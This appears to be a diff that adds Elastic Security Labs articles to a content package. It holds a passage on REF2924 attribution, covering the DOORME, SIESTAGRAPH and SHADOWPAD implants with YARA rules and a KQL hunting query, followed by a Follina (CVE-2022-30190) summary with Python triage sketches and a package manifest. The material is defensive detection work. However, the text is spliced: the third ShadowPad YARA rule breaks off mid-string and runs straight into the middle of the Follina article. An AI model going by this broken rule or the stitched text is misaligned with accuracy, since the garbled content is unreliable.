In analyzing these activity clusters, we have specific observations from our telemetry (host artifacts, capabilities, functionality, and adversary techniques) and third-party reporting consistent with our findings.\n\nWe use third-party reporting as supporting, but not factual, evidence to add context to our specific observations. It may be possible to verify that a third party had firsthand visibility of a threat, but that’s a rare luxury. We used estimative language in building associations where appropriate.\n\nTo uncover potential associations among these campaigns, we weighed host artifacts, tools, and TTPs more heavily than transitory atomic indicators like hashes, IP addresses, and domains.\n\nWe’ll discuss notable (non-exhaustive) overlaps in the following section.\n\n#### Campaigns 1 and 3\n\nCampaigns 1 ([Winnti](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/)) and 3 ([REF2924, ChamelGang, Winnti](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry)) are related by several elements: the use of the SHADOWPAD malware family, the specific file names (**log.dll** and **log.dll.dat**), and the injection technique using the same BitDefender hash.\n\n#### Campaigns 3 and 4\n\nCampaigns 3 (REF2924, ChamelGang, Winnti) and 4 (Undisclosed REF, ChamelGang) are related by the presence of a specifically configured DOORME backdoor and a shared national strategic interest for the adversary.\n\nUsing network scan results for about 180k publicly accessible Exchange servers, and specific authentication elements uncovered while reverse engineering REF2924’s DOORME sample, we were able to identify an identical DOORME configuration at a second telecommunications provider in Afghanistan. 
This was a different victim than Campaign 2 (Undisclosed REF, Winnti).\n\nWhile the DOORME IIS backdoor is not widely prevalent, simply having DOORME in your environment isn’t a strong enough data point to build an association. The presence of this specific DOORME configuration, when compared against a search of 180k other Exchange servers, combined with the moderate confidence in shared national strategic interests, led us to associate Campaigns 3 and 4 with high confidence and to conclude that Campaign 4 was the work of the same threat group.\n\n## Summary\n\nDOORME allows a threat actor to access a targeted network through the use of a backdoored IIS module on an internet-connected server. DOORME includes the capability to collect information about the infected host, upload shellcode chunks to evade detection, and execute shellcode in memory.\n\nSIESTAGRAPH is an implant discovered by Elastic Security Labs that uses the Microsoft Graph API for command and control. The Graph API is used for interacting with Microsoft Office 365, so C2 communication would be largely masked by legitimate network traffic. Elastic Security Labs has reported the tenant ID hard coded into SIESTAGRAPH to Microsoft.\n\nBased on our code analysis and the limited internet presence of DOORME and SIESTAGRAPH, we believe that this intrusion set is used by a limited distribution, or singular, threat actor.\n\nSHADOWPAD is a modular malware family that is used as a way to load and execute shellcode onto a victim system. 
While it has been tracked since 2017, SHADOWPAD continues to be a capable and popular remote access and persistence tool.\n\nThe REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others), represents an attack group that appears focused on priorities that, when observed across campaigns, align with a sponsored national strategic interest.\n\n## Detections\n\n### Hunting queries\n\nHunting queries are a starting point for surfacing potentially malicious events, but because every environment is different, any results should be fully investigated.\n\nThe following KQL query can be used to hunt for additional behaviors related to SIESTAGRAPH. This query looks for processes that are making DNS queries to graph.microsoft.com where the process does not have a trusted code-signing certificate or the process is not signed by Microsoft.\n\n```\ndns.question.name : \"graph.microsoft.com\" and (process.code_signature.trusted : \"false\" or not (process.code_signature.subject_name : \"Microsoft Windows\" or process.code_signature.subject_name : \"Microsoft Windows Publisher\" or process.code_signature.subject_name : \"Microsoft Corporation\")) and process.name : *\n```\n\n### Signatures\n\n- [Windows.Trojan.DoorMe](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DoorMe.yar)\n- [Windows.Trojan.SiestaGraph](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SiestaGraph.yar)\n- [Windows.Trojan.ShadowPad](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_ShadowPad.yar)\n\n### YARA rules\n\n#### The DOORME IIS module\n\n```\nrule Windows_Trojan_DoorMe {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-09\"\n last_modified = \"2022-12-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"DoorMe\"\n threat_name = \"Windows.Trojan.DoorMe\"\n license = \"Elastic License v2\"\n 
strings:\n $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }\n $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }\n $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }\n $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }\n $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 
66 90 }\n $str_0 = \".?AVDoorme@@\" ascii fullword\n condition:\n 3 of ($seq*) or 1 of ($str*)\n}\n```\n\n#### The SIESTAGRAPH implant\n\n```\nrule Windows_Trojan_SiestaGraph {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-14\"\n last_modified = \"2022-12-15\"\n os = \"windows\"\n arch_context = \"x86\"\n category_type = \"Trojan\"\n family = \"SiestaGraph\"\n threat_name = \"Windows.Trojan.SiestaGraph\"\n license = \"Elastic License v2\"\n strings:\n $a1 = \"downloadAsync\" ascii nocase fullword\n $a2 = \"UploadxAsync\" ascii nocase fullword\n $a3 = \"GetAllDriveRootChildren\" ascii fullword\n $a4 = \"GetDriveRoot\" ascii fullword\n $a5 = \"sendsession\" wide fullword\n $b1 = \"ListDrives\" wide fullword\n $b2 = \"Del OK\" wide fullword\n $b3 = \"createEmailDraft\" ascii fullword\n $b4 = \"delMail\" ascii fullword\n condition:\n all of ($a*) and 2 of ($b*)\n}\n```\n\n#### The SHADOWPAD malware family\n\n```\nrule Windows_Trojan_ShadowPad_1 {\n\tmeta:\n\t\tauthor = \"Elastic Security\"\n\t\tcreation_date = \"2023-01-23\"\n\t\tlast_modified = \"2023-01-31\"\n\t\tdescription = \"Target SHADOWPAD obfuscation loader+payload\"\n\t\tos = \"Windows\"\n\t\tarch = \"x86\"\n\t\tcategory_type = \"Trojan\"\n\t\tfamily = \"ShadowPad\"\n\t\tthreat_name = \"Windows.Trojan.ShadowPad\"\n\t\tlicense = \"Elastic License v2\"\n\tstrings:\n\t\t$a1 = { 87 0? 24 0F 8? }\n\t\t$a2 = { 9C 0F 8? }\n\t\t$a3 = { 03 0? 0F 8? }\n\t\t$a4 = { 9D 0F 8? }\n\t\t$a5 = { 87 0? 24 0F 8? 
}\n\tcondition:\n\t\tall of them\n}\nrule Windows_Trojan_Shadowpad_2 {\n\tmeta:\n\t\tauthor = \"Elastic Security\"\n\t\tcreation_date = \"2023-01-31\"\n\t\tlast_modified = \"2023-01-31\"\n\t\tdescription = \"Target SHADOWPAD loader\"\n\t\tos = \"Windows\"\n\t\tarch = \"x86\"\n\t\tcategory_type = \"Trojan\"\n\t\tfamily = \"Shadowpad\"\n\t\tthreat_name = \"Windows.Trojan.Shadowpad\"\n\t\tlicense = \"Elastic License v2\"\n\tstrings:\n\t\t$a1 = \"{%8.8x-%4.4x-%4.4x-%8.8x%8.8x}\"\n\tcondition:\n\t\tall of them\n}\nrule Windows_Trojan_Shadowpad_3 {\n\tmeta:\n\t\tauthor = \"Elastic Security\"\n\t\tcreation_date = \"2023-01-31\"\n\t\tlast_modified = \"2023-01-31\"\n\t\tdescription = \"Target SHADOWPAD payload\"\n\t\tos = \"Windows\"\n\t\tarch = \"x86\"\n\t\tcategory_type = \"Trojan\"\n\t\tfamily = \"Shadowpad\"\n\t\tthreat_name = \"Windows.Trojan.Shadowpad\"\n\t\tlicense = \"Elastic License v2\"\n\tstrings:\n\t\t$a1 = \"hH#whH#w\" fullword\n\t\t$a2 = \"Yuv~YuvsYuvhYuv]YuvRYuvGYuv1:tvdisclosure](https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/).\n\n## Summary\n\nReaders may [recall](https://www.elastic.co/blog/playing-defense-against-gamaredon-group) that template injection is an [established](https://attack.mitre.org/techniques/T1221/) technique enabling an attacker to remotely load malicious content when a document is opened by a relevant application. This vulnerability — dubbed “[Follina](https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e)” — works in conjunction with template injection, specifically when the remote template uses the ms-msdt URI handler. Importantly, it does not require macros to be enabled. 
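One way to triage suspect documents for this technique is to inspect the relationship targets inside the OOXML package. Below is a minimal Python sketch; note that in observed cases the ms-msdt URI typically lives in the remote HTML template rather than the document itself, so the sketch also flags remote attachedTemplate targets (the heuristic itself is an assumption, not a complete detection):

```python
import re
import zipfile


def suspicious_rel_targets(docx):
    """Return relationship targets worth a closer look in a .docx package.

    `docx` may be a path or a file-like object. Flags ms-msdt URIs directly,
    plus remote template relationships (the template-injection precondition
    this vulnerability rides on). Heuristic only; obfuscation may evade it.
    """
    hits = []
    with zipfile.ZipFile(docx) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            rels = z.read(name).decode("utf-8", errors="replace")
            for rel in re.findall(r"<Relationship\b[^>]*>", rels):
                m = re.search(r'Target="([^"]+)"', rel)
                if not m:
                    continue
                target = m.group(1)
                if target.lower().startswith("ms-msdt") or (
                    "attachedTemplate" in rel
                    and target.lower().startswith("http")
                ):
                    hits.append(target)
    return hits
```

A .docx file is an ordinary ZIP archive, so the standard-library `zipfile` module is sufficient here.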
As in other cases of template injection, readers should be aware that remote objects may be heavily obfuscated.\n\nSecurity teams should monitor msdt.exe as a child process of WINWORD.exe and other applications, paying particular attention to command line arguments and network activity attributed to that child process. Security teams may also consider monitoring network activity from all MS Office applications and their descendants as one way of generically identifying initial exploitation attempts via weaponized documents.\n\nElastic is deploying a new malware signature to identify the use of ms-msdt URIs. This signature will be distributed via the Elastic Endpoint. The team has also issued an update to the “[Suspicious MS Office Child Process](https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_suspicious_ms_office_child_process.toml)” rule available via the [detection-rules repository](https://github.com/elastic/detection-rules), adding “msdt.exe” to the list of suspicious descendants and “Outlook.exe” to the list of relevant parent processes. 
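The parent/child monitoring described above can be expressed as a simple walk over process records. This is a sketch only: the record shape (pid, ppid, name) and the list of Office parents are assumptions, and a real deployment would rely on endpoint telemetry rather than point-in-time snapshots like this.

```python
# Flag msdt.exe processes that descend from an MS Office application, given a
# snapshot of process records. Record shape and the Office list are
# assumptions for this sketch.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def flag_msdt_descendants(procs):
    by_pid = {p["pid"]: p for p in procs}
    flagged = []
    for proc in procs:
        if proc["name"].lower() != "msdt.exe":
            continue
        seen = set()
        cur = by_pid.get(proc["ppid"])
        # Walk up the ancestry chain looking for an Office application;
        # the `seen` set guards against cycles in a stale snapshot.
        while cur is not None and cur["pid"] not in seen:
            if cur["name"].lower() in OFFICE_APPS:
                flagged.append(proc)
                break
            seen.add(cur["pid"])
            cur = by_pid.get(cur["ppid"])
    return flagged
```

Checking the full ancestry chain (rather than only the immediate parent) matters because msdt.exe is often launched through an intermediate process such as cmd.exe.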
The following query pertains to Elastic Endgame:\n\n```\nnetwork where process_name == \"msdt.exe\" and\ndescendant of [process where process_name == \"winword.exe\"]\n| unique process_name, command_line\n```\n\n## References\n\nSeveral organizations have released information and resources related to this vulnerability (non-exhaustive):\n\n- Microsoft’s [guidance](https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/), outlining one method of disabling the MSDT URL protocol\n- Huntress has provided their [analysis](https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug) of the vulnerability with additional information about ms-msdt abuse\n- Todyl has shared an [Elastic query](https://twitter.com/brent_murphy/status/1531322468228399104?t=yX_zDYE4ew6gA4am6a75Ug&s=09) pertaining to process events\n- Kevin Beaumont has provided a [write-up](https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e) with historical and other details about potential implementations.\n"
+ },
+ "title": "Vulnerability summary: Follina, CVE-2022-30190",
+ "slug": "vulnerability-summary-follina",
+ "date": "2023-01-19",
+ "description": "Elastic is deploying a new malware signature to identify the use of the Follina vulnerability. Learn more in this post.",
+ "author": [
+ {
+ "slug": "devon-kerr"
+ }
+ ],
+ "image": "blog-security-detection-720x420.png",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ]
+ },
+ "id": "security_labs_content-vulnerability_summary_follina-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/manifest.yml b/packages/security_labs_content/manifest.yml
new file mode 100644
index 00000000000..776e1d9435c
--- /dev/null
+++ b/packages/security_labs_content/manifest.yml
@@ -0,0 +1,25 @@
+format_version: 3.3.5
+name: security_labs_content
+title: "Security Labs content"
+version: 0.0.1
+source:
+ license: "Elastic-2.0"
+description: "Package containing the Security Labs content from https://www.elastic.co/security-labs."
+type: content
+categories:
+ - security
+conditions:
+ elastic:
+ capabilities:
+ - security
+ subscription: "basic"
+ kibana:
+ version: "^8.19.0 || ^9.1.0"
+icons:
+ - size: 16x16
+ src: /img/security-logo-color-64px.svg
+ title: Security logo
+ type: image/svg+xml
+owner:
+ github: elastic/security-generative-ai
+ type: elastic